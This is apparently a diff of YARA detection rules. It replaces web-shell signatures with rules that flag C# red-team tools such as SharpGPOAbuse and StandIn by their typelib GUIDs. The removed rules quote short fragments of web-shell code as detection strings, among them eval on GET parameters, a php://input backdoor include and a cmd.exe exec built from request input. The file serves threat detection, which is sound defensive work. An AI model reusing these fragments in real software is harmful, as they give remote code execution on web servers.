-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L981-L995"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e96aa79b-1da2-5b0c-9ac2-b6e201e06ec6"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/djhohnstein/SharpShares/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2274-L2287"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cc4d4d6cc9a25984aa9a7583c7def174"
-		logic_hash = "b90ba15b7b2c557f7b2303695b7f1f737f63df06d712c89e0cfea51c7d37e21d"
-		score = 70
+		logic_hash = "09151f0ee360aaa74ebd0fe809ee45135705475a8559f78762ea80e261d173f3"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParam"
-		$s1 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+		$typelibguid0lo = "fe9fdde5-3f38-4f14-8c64-c3328c215cf2" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Jshell
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpedrchecker : FILE
 {
 	meta:
-		description = "Web Shell - file jshell.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L996-L1013"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f7ff344e-f8ee-5c3a-bdd1-de3cae8e7dfb"
+		date = "2020-12-18"
+		modified = "2025-08-15"
+		reference = "https://github.com/PwnDexter/SharpEDRChecker"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2289-L2302"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "124b22f38aaaf064cef14711b2602c06"
-		logic_hash = "dfe3ac097de4ca406ab7ec967fdc03d1e87c74f84fc675b58438a842d80cccda"
-		score = 70
+		logic_hash = "9a5a192bb5aedf801465760fd362e0917c7a68c97058c82d0954ce44d3632c43"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "kXpeW[\"" fullword
-		$s4 = "[7b:g0W@W<" fullword
-		$s5 = "b:gHr,g<" fullword
-		$s8 = "RhV0W@W<" fullword
-		$s9 = "S_MR(u7b" fullword
+		$typelibguid0lo = "bdfee233-3fed-42e5-aa64-492eb2ac7047" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_ASP_Zehir4
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcliphistory : FILE
 {
 	meta:
-		description = "Web Shell - file zehir4.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1014-L1027"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "89ca4717-a4ec-5371-8dc3-bdb9933384af"
+		date = "2020-12-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/FSecureLABS/SharpClipHistory"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2304-L2317"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7f4e12e159360743ec016273c3b9108c"
-		logic_hash = "aa3e07ee6369dd5f86f28a53c8e45391de718d4935021339a7b47829b5196f54"
-		score = 70
+		logic_hash = "18558f9c446847d2021c3f2a99315c490fc26b1c585dd8a7a0ba4470be8d1e45"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "Response.Write \"<a href='\"&dosyaPath&\"?status=7&Path=\"&Path&\"/"
+		$typelibguid0lo = "1126d5b4-efc7-4b33-a594-b963f107fe82" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Wsb_Idc
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpgpo_Remoteaccesspolicies : FILE
 {
 	meta:
-		description = "Web Shell - file idc.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1028-L1042"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "642c2672-2327-5a4a-af91-6e0559996908"
+		date = "2020-12-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2319-L2332"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7c5b1b30196c51f1accbffb80296395f"
-		logic_hash = "f274061f1a02ab65bc574a6586343f74262a463c5200cd2c231a752f54967404"
-		score = 70
+		logic_hash = "e2e3168f733ce8a3e6129e4f2faa6a90a47f6cfc683c840032c0323170720a1b"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)" fullword
-		$s3 = "{eval($_GET['idc']);}" fullword
+		$typelibguid0lo = "fbb1abcf-2b06-47a0-9311-17ba3d0f2a50" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Cpg_143_Incl_Xpl
+rule SIGNATURE_BASE_HKTL_NET_GUID_Absinthe : FILE
 {
 	meta:
-		description = "Web Shell - file cpg_143_incl_xpl.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1043-L1057"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8f25593b-b9d2-5807-b299-b039ecfd43a5"
+		date = "2020-12-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/cameronhotchkies/Absinthe"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2334-L2347"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5937b131b67d8e0afdbd589251a5e176"
-		logic_hash = "7c2ce25c33e167761d72331d7c4d4f7cd6029ee0caf6e2008df8b12894faaaf8"
-		score = 70
+		logic_hash = "54040db5bdcfc711a26401d082693471c3f98fc043a550d1253f72a2d2611ae4"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "$data=\"username=\".urlencode($USER).\"&password=\".urlencode($PA"
-		$s5 = "fputs($sun_tzu,\"<?php echo \\\"Hi Master!\\\";ini_set(\\\"max_execution_time"
+		$typelibguid0lo = "9936ae73-fb4e-4c5e-a5fb-f8aaeb3b9bd6" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Mumaasp_Com
+rule SIGNATURE_BASE_HKTL_NET_GUID_Exploitremotingservice : FILE
 {
 	meta:
-		description = "Web Shell - file mumaasp.com.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1058-L1071"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2f0b9635-2b2e-5825-baeb-69d7ae3791b1"
+		date = "2020-12-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/tyranid/ExploitRemotingService"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2349-L2364"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cce32b2e18f5357c85b6d20f564ebd5d"
-		logic_hash = "75e2a056782190e9914264b9e34002faea75a35ab0f97bf1e05dec15432d064c"
-		score = 70
+		logic_hash = "b22513722be15f582d06c23fb6db53722c0edf2f89f17e28ca067f431ffd4616"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "&9K_)P82ai,A}I92]R\"q!C:RZ}S6]=PaTTR"
+		$typelibguid0lo = "fd17ae38-2fd3-405f-b85b-e9d14e8e8261" ascii wide
+		$typelibguid1lo = "1850b9bb-4a23-4d74-96b8-58f274674566" ascii wide
+		$typelibguid2lo = "297cbca1-efa3-4f2a-8d5f-e1faf02ba587" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Php_404
+rule SIGNATURE_BASE_HKTL_NET_GUID_Xploit : FILE
 {
 	meta:
-		description = "Web Shell - file 404.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1072-L1085"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "11ba6c14-06b6-5d9f-ac69-08ae506877e7"
+		date = "2020-12-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/shargon/Xploit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2366-L2389"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ced050df5ca42064056a7ad610a191b3"
-		logic_hash = "3fc928e6edda8fdc4220f57215db61b7fbf8de5b00423b219a173c8ecde40b79"
-		score = 70
+		logic_hash = "0b622acce9ff8186266c69d4ca097902027f5ca652408bfa4ec36fa145e14737"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$pass = md5(md5(md5($pass)));" fullword
+		$typelibguid0lo = "4545cfde-9ee5-4f1b-b966-d128af0b9a6e" ascii wide
+		$typelibguid1lo = "33849d2b-3be8-41e8-a1e2-614c94c4533c" ascii wide
+		$typelibguid2lo = "c2dc73cc-a959-4965-8499-a9e1720e594b" ascii wide
+		$typelibguid3lo = "77059fa1-4b7d-4406-bc1a-cb261086f915" ascii wide
+		$typelibguid4lo = "a4a04c4d-5490-4309-9c90-351e5e5fd6d1" ascii wide
+		$typelibguid5lo = "ca64f918-3296-4b7d-9ce6-b98389896765" ascii wide
+		$typelibguid6lo = "10fe32a0-d791-47b2-8530-0b19d91434f7" ascii wide
+		$typelibguid7lo = "679bba57-3063-4f17-b491-4f0a730d6b02" ascii wide
+		$typelibguid8lo = "0981e164-5930-4ba0-983c-1cf679e5033f" ascii wide
+		$typelibguid9lo = "2a844ca2-5d6c-45b5-963b-7dca1140e16f" ascii wide
+		$typelibguid10lo = "7d75ca11-8745-4382-b3eb-c41416dbc48c" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshell_Cnseay_X
+rule SIGNATURE_BASE_HKTL_NET_GUID_Poc : FILE
 {
 	meta:
-		description = "Web Shell - file webshell-cnseay-x.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1086-L1099"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5669bc1a-b32e-5ae7-bf94-8ed2a124c765"
+		date = "2020-12-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/thezdi/PoC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2391-L2404"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a0f9f7f5cd405a514a7f3be329f380e5"
-		logic_hash = "59cb8b8a5873b716a25096c7b12f09293a812b63f31fea07d919b9c4d2bc9a19"
-		score = 70
+		logic_hash = "f3001a60ce4b6415de2cb035ab56023cd2ee5f4c73e745d87409e5fef1fc9e8a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "$_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_"
+		$typelibguid0lo = "89f9d411-e273-41bb-8711-209fd251ca88" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Up
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpgpoabuse : FILE
 {
 	meta:
-		description = "Web Shell - file up.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1100-L1114"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ea27044f-69be-5db7-8d77-28dafb18c7e5"
+		date = "2020-12-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/FSecureLABS/SharpGPOAbuse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2406-L2419"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f775e721cfe85019fe41c34f47c0d67c"
-		logic_hash = "dff2896d2226ade08e74147121a0e0036e8545dfff36b48b5a0771c9c7d537e9"
-		score = 70
+		logic_hash = "683be1b4cee3ba705146f62cdc36c99ce5e4711cd38aec8103584321afd934f1"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Pos = InstrB(BoundaryPos,RequestBin,getByteString(\"Content-Dispositio"
-		$s1 = "ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))" fullword
+		$typelibguid0lo = "4f495784-b443-4838-9fa6-9149293af785" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Phpkit_0_1A_Odd
+rule SIGNATURE_BASE_HKTL_NET_GUID_Watson : FILE
 {
 	meta:
-		description = "Web Shell - file odd.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1115-L1131"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "6dc7bb08-0b34-50a0-8ae8-02d96d66a334"
+		date = "2020-12-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/rasta-mouse/Watson"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2421-L2434"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3c30399e7480c09276f412271f60ed01"
-		logic_hash = "745734658ed4000e1399531ae44125f8462ecd37388e6223cfa9bf91dbb52bbc"
-		score = 70
+		logic_hash = "0fa1d96e9c9fdd612f092dbdcde980956cf4bf24b384991d77737af43637bb34"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "include('php://input');" fullword
-		$s3 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
-		$s4 = "// uses include('php://input') to execute arbritary code" fullword
-		$s5 = "// php://input based backdoor" fullword
+		$typelibguid0lo = "49ad5f38-9e37-4967-9e84-fe19c7434ed7" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_ASP_Cmd
+rule SIGNATURE_BASE_HKTL_NET_GUID_Standin : FILE
 {
 	meta:
-		description = "Web Shell - file cmd.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1132-L1145"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2af3c28a-ce5d-5dea-9abe-ff54b180049e"
+		date = "2020-12-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/FuzzySecurity/StandIn"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2436-L2449"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "97af88b478422067f23b001dd06d56a9"
-		logic_hash = "c1353e43876e18f18638a558a29a12d6e82603641fedd81b042adca91fea0d18"
-		score = 70
+		logic_hash = "db008e841cef47916e06167661b3825d1272357a347f522ccea25cc887438480"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$typelibguid0lo = "01c142ba-7af1-48d6-b185-81147a2f7db7" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_Shell_X3
+rule SIGNATURE_BASE_HKTL_NET_GUID_Azure_Password_Harvesting : FILE
 {
 	meta:
-		description = "Web Shell - file PHP Shell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1146-L1161"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "681cf9da-d664-5402-b7ac-eb2cfad85da9"
+		date = "2020-12-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/guardicore/azure_password_harvesting"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2451-L2464"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
-		logic_hash = "7361a7eecf345b9c1809294b6b081db8769805ec3e6c656adc4ac87261193683"
-		score = 70
+		logic_hash = "eac946e4110f9e7fdcc69ca562ed37a5e77216a325ccd11e29ec7348c2dd12d4"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
-		$s6 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
-		$s9 = "if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset("
+		$typelibguid0lo = "7ad1ff2d-32ac-4c54-b615-9bb164160dac" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_G00Nv13
+rule SIGNATURE_BASE_HKTL_NET_GUID_Powerops : FILE
 {
 	meta:
-		description = "Web Shell - file g00nv13.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1162-L1176"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3ef9f099-13c9-5b6f-8615-232240530078"
+		date = "2020-12-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/fdiskyou/PowerOPS"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2466-L2479"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "35ad2533192fe8a1a76c3276140db820"
-		logic_hash = "dd9f03a7ad0d2b73f7a8602ab267e0e8e5cb1f9250f9a25c86ded3797df2f8d5"
-		score = 70
+		logic_hash = "7afb5a5c5eaaba574f31d2041ec2e23f969508bac76aeb58a98714b06b8e6ae7"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": cas"
-		$s4 = "if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p"
+		$typelibguid0lo = "2a3c5921-7442-42c3-8cb9-24f21d0b2414" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Php_H6Ss
+rule SIGNATURE_BASE_HKTL_NET_GUID_Random_Csharptools : FILE
 {
 	meta:
-		description = "Web Shell - file h6ss.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1177-L1190"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ad8b5573-ad20-50cd-927b-a6401b10e653"
+		date = "2020-12-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/xorrior/Random-CSharpTools"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2481-L2500"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "272dde9a4a7265d6c139287560328cd5"
-		logic_hash = "c4001be111ff271335dd65c15c59da979a8e202bcf58a7f10de7f03644472153"
-		score = 70
+		logic_hash = "633cfdc2f1950f36474e15cb186fc4673e7cbc9417fdbee61409b14be94bc6cb"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php eval(gzuncompress(base64_decode(\""
+		$typelibguid0lo = "f7fc19da-67a3-437d-b3b0-2a257f77a00b" ascii wide
+		$typelibguid1lo = "47e85bb6-9138-4374-8092-0aeb301fe64b" ascii wide
+		$typelibguid2lo = "c7d854d8-4e3a-43a6-872f-e0710e5943f7" ascii wide
+		$typelibguid3lo = "d6685430-8d8d-4e2e-b202-de14efa25211" ascii wide
+		$typelibguid4lo = "1df925fc-9a89-4170-b763-1c735430b7d0" ascii wide
+		$typelibguid5lo = "817cc61b-8471-4c1e-b5d6-c754fc550a03" ascii wide
+		$typelibguid6lo = "60116613-c74e-41b9-b80e-35e02f25891e" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Zx
+rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2020_0668 : FILE
 {
 	meta:
-		description = "Web Shell - file zx.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1191-L1204"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "54c87578-f0f1-5108-a736-b6acd9624d29"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/RedCursorSecurityConsulting/CVE-2020-0668"
